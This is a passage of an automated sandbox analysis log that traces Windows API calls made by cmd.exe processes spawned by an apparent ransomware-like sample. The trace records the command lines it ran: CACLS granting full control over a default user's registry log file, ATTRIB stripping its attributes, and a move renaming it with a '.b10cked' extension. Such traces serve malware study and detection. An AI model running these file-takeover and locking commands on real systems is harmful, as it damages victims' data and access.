| out: lpLCData="Sun") returned 4 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.657] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0215.657] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.658] GetConsoleTitleW (in: lpConsoleTitle=0x4e08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.658] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.658] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.659] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.659] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.659] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0215.660] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0215.660] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0215.660] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0215.660] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0215.660] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0215.660] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0215.660] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0215.662] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0215.662] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0215.662] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0215.662] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0215.662] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0215.662] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0215.662] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0215.663] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.663] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0215.663] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0215.663] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0215.663] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0215.663] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0215.663] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0215.664] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0215.664] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0215.664] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0215.664] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0215.664] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0215.664] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0215.664] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0215.664] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0215.664] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0215.664] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0215.664] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0215.664] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0215.664] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0215.664] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0215.664] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0215.664] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0215.664] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0215.664] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0215.664] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0215.664] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0215.664] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0215.664] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0215.664] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0215.664] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0215.664] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0215.664] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0215.664] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0215.664] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0215.664] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0215.664] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0215.664] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0215.665] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0215.665] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0215.665] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0215.665] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0215.665] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0215.665] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0215.665] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0215.665] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0215.665] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0215.665] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0215.665] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0215.665] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0215.665] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0215.665] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0215.665] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0215.665] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0215.665] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0215.665] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0215.665] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0215.665] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0215.665] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0215.665] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0215.665] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0215.665] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0215.665] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0215.665] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0215.665] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0215.665] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0215.665] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0215.665] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0215.666] SetErrorMode (uMode=0x0) returned 0x0 [0215.666] SetErrorMode (uMode=0x1) returned 0x0 [0215.666] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4f1ba0, lpFilePart=0x2ef01c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef01c*="Desktop") returned 0x18 [0215.666] SetErrorMode (uMode=0x0) returned 0x1 [0215.666] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0215.666] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.671] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.671] FindClose (in: hFindFile=0x4e0f70 | out: hFindFile=0x4e0f70) returned 1 [0215.672] FindClose (in: hFindFile=0x4e0f70 | out: hFindFile=0x4e0f70) returned 1 [0215.672] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0215.672] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0215.672] GetConsoleTitleW (in: lpConsoleTitle=0x2ef290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.773] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef118, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef1e0 | out: lpAttributeList=0x2ef118, lpSize=0x2ef1e0) returned 1 [0215.773] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef118, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef1d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef118, lpPreviousValue=0x0) returned 1 [0215.773] GetStartupInfoW (in: lpStartupInfo=0x2ef0d4 | out: lpStartupInfo=0x2ef0d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0215.773] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.774] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef174*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1c0 | out: lpCommandLine="CACLS \"C:\\Users\\Default\\NTUSER.DAT.LOG2\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2ef1c0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbfc, dwThreadId=0xc20)) returned 1 [0215.777] CloseHandle (hObject=0x4c) returned 1 [0215.777] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.777] GetEnvironmentStringsW () returned 0x4f0198* [0215.777] FreeEnvironmentStringsW (penv=0x4f0198) returned 1 [0215.777] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0216.005] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef0b4 | out: lpExitCode=0x2ef0b4*=0x0) returned 1 [0216.005] CloseHandle (hObject=0x50) returned 1 [0216.006] _vsnwprintf (in: _Buffer=0x2ef1fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0c0 | out: _Buffer="00000000") returned 8 [0216.006] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.006] GetEnvironmentStringsW () returned 0x4f20d8* [0216.006] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.006] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.006] GetEnvironmentStringsW () returned 0x4f20d8* [0216.006] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.006] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef118 | out: lpAttributeList=0x2ef118) [0216.006] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.007] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.007] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0216.007] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.007] FindClose (in: hFindFile=0x4ee3a8 | out: hFindFile=0x4ee3a8) returned 1 [0216.008] FindClose (in: hFindFile=0x4ee3a8 | out: hFindFile=0x4ee3a8) returned 1 [0216.008] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0216.008] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0216.008] GetConsoleTitleW (in: lpConsoleTitle=0x2ef290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.008] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef118, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef1e0 | out: lpAttributeList=0x2ef118, lpSize=0x2ef1e0) returned 1 [0216.008] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef118, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef1d8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef118, lpPreviousValue=0x0) returned 1 [0216.008] GetStartupInfoW (in: lpStartupInfo=0x2ef0d4 | out: lpStartupInfo=0x2ef0d4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0216.008] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0216.008] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef174*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1c0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\Default\\NTUSER.DAT.LOG2\"", lpProcessInformation=0x2ef1c0*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc30, dwThreadId=0xb3c)) returned 1 [0216.010] CloseHandle (hObject=0x50) returned 1 [0216.010] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0216.010] GetEnvironmentStringsW () returned 0x4f20d8* [0216.010] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.010] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0216.102] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef0b4 | out: lpExitCode=0x2ef0b4*=0x0) returned 1 [0216.102] CloseHandle (hObject=0x4c) returned 1 [0216.102] _vsnwprintf (in: _Buffer=0x2ef1fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0c0 | out: _Buffer="00000000") returned 8 [0216.102] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.102] GetEnvironmentStringsW () returned 0x4f20d8* [0216.102] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.102] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.102] GetEnvironmentStringsW () returned 0x4f20d8* [0216.102] FreeEnvironmentStringsW (penv=0x4f20d8) returned 1 [0216.102] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef118 | out: lpAttributeList=0x2ef118) [0216.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.102] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0216.103] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.103] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0216.103] SetConsoleInputExeNameW () returned 0x1 [0216.103] GetConsoleOutputCP () returned 0x1b5 [0216.103] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0216.103] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.103] exit (_Code=0) Process: id = "543" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16340" os_pid = "0xe08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\NTUSER~1.LOG\" \"C:\\Users\\Default\\NTUSER.DAT.LOG1.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31848 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31849 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31850 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31851 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 31852 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31853 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31854 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31855 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31856 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 31857 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32024 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32025 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 32026 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 32027 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32028 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32029 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32030 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32031 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32032 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32033 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32034 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32035 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32036 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 32037 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32038 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32039 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32040 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 32041 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 32042 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 32043 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 32044 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 32045 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 32047 start_va = 0x2d0000 end_va = 0x38ffff entry_point = 0x2d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 742 os_tid = 0x600 [0215.750] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf84c | out: lpSystemTimeAsFileTime=0x1cf84c*(dwLowDateTime=0xb565c780, dwHighDateTime=0x1d440a9)) [0215.750] GetCurrentProcessId () returned 0xe08 [0215.750] GetCurrentThreadId () returned 0x600 [0215.750] GetTickCount () returned 0x3c60c [0215.750] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf844 | out: lpPerformanceCount=0x1cf844*=27253920020) returned 1 [0215.751] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.751] __set_app_type (_Type=0x1) [0215.751] __p__fmode () returned 0x76b331f4 [0215.751] __p__commode () returned 0x76b331fc [0215.751] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.751] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.751] GetCurrentThreadId () returned 0x600 [0215.751] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x600) returned 0x38 [0215.751] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.751] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.752] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.752] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.752] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf7dc | out: phkResult=0x1cf7dc*=0x0) returned 0x2 [0215.752] VirtualQuery (in: lpAddress=0x1cf813, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.752] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.752] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf7ac, dwLength=0x1c | out: lpBuffer=0x1cf7ac*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.752] 